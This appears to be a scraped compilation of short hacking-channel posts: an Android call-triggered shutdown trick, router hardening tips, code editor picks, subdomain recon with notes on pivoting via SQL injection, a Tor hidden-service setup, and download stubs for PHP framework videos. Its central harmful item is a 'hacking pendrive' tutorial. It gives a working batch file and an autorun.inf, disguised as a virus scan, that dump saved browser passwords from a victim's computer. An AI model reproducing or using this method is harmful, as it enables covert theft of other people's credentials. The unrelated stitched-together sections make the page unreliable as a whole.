Shut Down your ANDROID Device by Making Call from Another Phone (like a pro)

 

—> Step 1 : First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.


—> Step 2 : Next, select ‘My Rules’ and tap on the (+) icon.


—> Step 3 : In the next screen tap on the ‘Call State Trigger’


—> Step 4 : Now, choose the option ‘Incoming Call’


—> Step 5 : In the next step, select the contact. You can choose from saved contacts or can create a new one.


—> Step 6 : Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’


—> Step 7 : Now you need to provide the name for the rule and save the rule.


        ✅ Now you just need to make a call from the contact you specified and your Android device will be SHUT DOWN.


Follow us for more... 

HOW TO CREATE A HACKING PENDRIVE THAT CAN STEAL PASSWORDS FROM VICTIMS


🀄In this tutorial as Steal Passwords I am going to show you that how to make a Portable Hacking device with a Pendrive that can hack most of the online passwords from victims computer and with the help of this program you can also help your friends and relatives to recover their forgotten passwords or you can say as Steal Passwords, Yes you heard it right after following this tutorial you can hack like a pro and the tutorial is very easy☠!!


 ✒HACKING PENDRIVE THAT CAN STEAL PASSWORDS FROM VICTIMS COMPUTER📍


THINGS YOU NEED:


1. Pen Drive

2. Computer/Laptop

3. Web Browser Pass View(Download)


Step 1: Download Web Browser Pass views Zip file

Step 2: Insert your Pendrive to your Computer and then Quick Format It as NTFS


Step 3: Create a New Folder in your Pendrive and name the folder as “USB” and then Extract the Web Browser Passview zip file into the USB folder.


Step 4: Open a Notepad and then copy the things written below and then Save the File As USB Driver.bat


@echo off

cls

start \usb\WebBrowserPassView.exe /shtml 1.html


Step 5: Open a Notepad and then copy the things written below and then Save the File As Autorun.inf


[autorun]

open=usbdriver.bat

Action=Perform a virus Scan


Step 6: Copy both the file Autorun.inf and USBdriver.bat into your pen drive.


Step 7: Insert it into your Victims computer and you will see that after inserting it will ask for Performing a Virus Scan and then tap yes and after tapping you will get a screen Like this, just tap ctrl+a and then Ctrl+s and save the file to your pen drive, do it fast, Now open that Notepad file that you have saved, Voila, you got the passcodes of your friend.


☣Note: Sometimes the Autorun File doesn’t work in that criteria, you have to open the pen drive partition and then double click on USB Driver and after that just tap ctrl+a and then Ctrl+s and save the file to your pen drive. Make sure that you are doing it fast to Steal Passwords.

Enjoy! Follow us for more... 

HOW TO MAKE YOUR WI-FI ROUTER HACKPROOF ??

If you are using a wifi router it becomes the primary target of the hacker so to protect it you should follow all the security measures properly. And there is nothing like Hackproof but still you can make it as secured as possible to avoid getting Hacked.


1. ENABLE WPA2 or WPA3 WIRELESS ENCRYPTION


It is highly recommended for all of you to enable WPA2 or WPA3 wireless encryption. 


If you aren't using a minimum of Wi-Fi Protected Access 2 (WPA2) encryption, this leaves your network wide open because hackers can virtually walk into your network.


Check your Router manufacturer's manual to learn how to enable WPA2\WPA3 wireless encryption on your router.


2. ALWAYS CREATE A STRONG SSID NETWORK NAME


Creating a strong SSID (YOUR WIRELESS NETWORK NAME) will help you avoid getting hacked easily. 


Using a default SSID or a common one like TP-LINK, D LINK, etc. helps hackers to crack your encryption because they can use prebuilt rainbow tables associated with common SSID names to crack your wireless encryption.


3. TURN ON YOUR WIRELESS ROUTER'S FIREWALL


Enabling the firewall can make your network less visible to hackers looking for targets on the internet. 


4. USE A VPN TO KEEP YOUR LOCAL TRAFFIC ENCRYPTED


VPN’s make it harder for an attacker to see what the target is doing online, or to redirect users to a malicious website.


5. DISABLE ADMIN ACCESS WIRELESSLY


By disabling the admin access on your router will avoid hackers from messing with your wireless router as someone who is physically connected to your router with an Ethernet cable can only access the admin features of your wireless router.


Enjoy! Follow us for more...

5 FREE BEST CODE EDITORS SOFTWARES


1. NOTEPAD++


Notepad++ is a popular free to use code editor written in C++ language. It is one of the best code editor out there for windows. It uses Win32 API and GPL License.


2. KITE


Looking for Software that will Automatically complete the multiple line codes? Then Kite is the one you are looking for. And it supports more than 16 languages


3. ATOM


Atom is love of programmers when it comes to code editing software. Why? Because it has a simple and neat interface. And it is available for Mac, Windows and Linux.


4. VISUAL STUDIO CODE


Visual Studio Code aka VS Code is an open source code editor software developed by Microsoft itself, it allows Code refactoring & debugging.


5. SUBLIME TEXT


Sublime Text is also one of the best code editor software you can you use to make your work easier. Sublime text is free but yes, you need to purchase their license.


Enjoy! Follow us for more...

How to detect and recon the technology of a website

 🔰 How to detect and recon the technology of a website. 🔰


We are going to use

http://viewdns.info/

website or google.com for detecting the sub-domains of a website and information gathering.


In Google, we use the querysite:*.targetsite.com orsite:*targetsite.com


For instance if we want to find sub-domains of microsoft.com with google, we would use the query site:*.microsoft.com, see the picture below:


By:-- @exploithacker


As you can see, there are many sub-domains like:mva.microsoft.com,imagine.microsoft.comand others.


A good penetration tester always checks all sub-domains for vulnerabilities. Even if they are not on the same network, they could contain useful information.


Another way for finding sub-domains and other useful information online, is to use these sites:  http://viewdns.info/

 http://www.wolframalpha.com and https://www.netcraft.com


I used


http://www.wolframalpha.comfor the following demonstration: 



On the third table we hit sub-domains to see all sub-domains of the site:




Just as easy as that.


Another thing we should consider is the Reverse ip lookup. What is reverse ip lookup? It is used to find all sites hosted on a given server. For example on one server, we  could have 2 or more web applications hosted on the same IP (see the demonstration for p30download.com site for example).



The hint is if we find any vulnerability in other web applications hosted on that IP, we may be able to pawn the others. For example, we find SQL Injection on one of the domains and when we hack in to database, we also find other domains’ database information in that.


If we want to find sub-domains in Kali Linux we can use the command: fierce -dns <domain name>


I personally prefer using online tools because my IP remains safe from IDS and firewalls and it does not get blacklisted 

In my experience the sub-domains have a greater possibility to have vulnerabilities as the programmers usually don’t pay much attention on the security terms of the sub-domains because the sub-domains are usually less interactive with users.


Anyway, in our case we are not going to test all sub-domains but instead just test this su-domain: 

 http://testphp.acunetix.com/


➖➖➖

How to host your own site on darkweb on windows


Tools 🎉🎉


√ Xampp

√ Tor browser 

√ Notepad ++

----------------------------------------------


✅ Open tor browser directory 

✅Go to following path 


Egs: c:/tor browser/browser/Tor browser/data/tor/


✅make a folder at the safe place (anywhere)


✅Edit file named "torrc" inside above directory


✅Add these line at end 


" HiddenServiceDir /Library/Tor/var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 "


✅Add the new folder path that u have created And add after " HiddenServiceDir "


✅Now save the file and fire up the tor browser


✅ Open the folder u created in step 3 and open host file u will see your domain name 


✅ Now install Xampp 



✅Got to "c:/Xampp/htdocs/" and your website  file that's set 


✅Now run apache server and php server from Xampp control pannel 


Now your website is accessable frome darkweb 


    Enjoy! Follow us for more.... 

CakePHP app walkthrough

 

Download now

Enjoy! Follow us for more...

Yii advanced concepts and next steps

 

Download now


Enjoy! Follow us for more.... 

Intro to Laravel

 

Download now


Enjoy! Follow us for more... 

CodeIgniter advanced concepts and next steps

 

Download now

Enjoy! Follow us for more... 

Symfony advanced concepts and next steps

 

Download now

Enjoy! Follow us for more... 

CodeIgniter concepts and features

 

Download now


Enjoy! Follow us for more... 

CodeIgniter app walkthrough

 

Download now

Enjoy! Follow us for more... 

CodeIgniter setup

 

Download now


Enjoy! Follow us for more

Intro to CodeIgniter 2.x

 

Download now

Enjoy! Follow us for more... 

What is Prototype content functions in JavaScript Framework Programming.mp4

  Download now Enjoy! Follow us for more...